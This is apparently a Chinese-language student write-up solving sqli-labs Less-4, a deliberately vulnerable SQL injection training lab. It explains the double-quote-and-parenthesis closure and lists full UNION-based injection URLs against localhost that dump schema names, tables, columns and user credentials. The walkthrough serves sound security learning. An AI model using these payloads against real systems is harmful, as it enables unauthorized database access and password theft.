sqli-labs(4)
sqli-libs(4)通关过程
0x01爱之初体验
首先我们进行注入试探 发现我们的单引号 回显事正常的 双引号回显反而是错误的
查看源码我们发现 多了一个给id赋值的语句 我们在php上面执行一下看一下是什么意思
<?php $id='1'; $id = '"' . $id . '"'; echo $id; ?>
我们看见执行的结果是"1" 可以得知原来这个语法是个id参数加了两个双引号 并且还是右括号的注入
思路有了我们开始下一步
0x02爱之初试探
看看我们的思路是不是对的 他的参数应该是id=("")这样的 那么我们只需要闭合前面的语句就行 后面的用%23来闭合 执行一下语句
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,database()%23
我滴天成功了 思路是真确的 那么就下来我们就要进行正常流程了
0x03爱之深入挑选
a爆库名
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(schema_name)%20from%20information_schema.schemata)%23
b爆表名
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%23
c爆列名
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)%23
d爆字段
http://127.0.0.1/sql1/Less-4/?id=-1%22)%20union%20select%20null,null,(select%20group_concat(username,0x3a,password)%20from%20users)%23
成功执行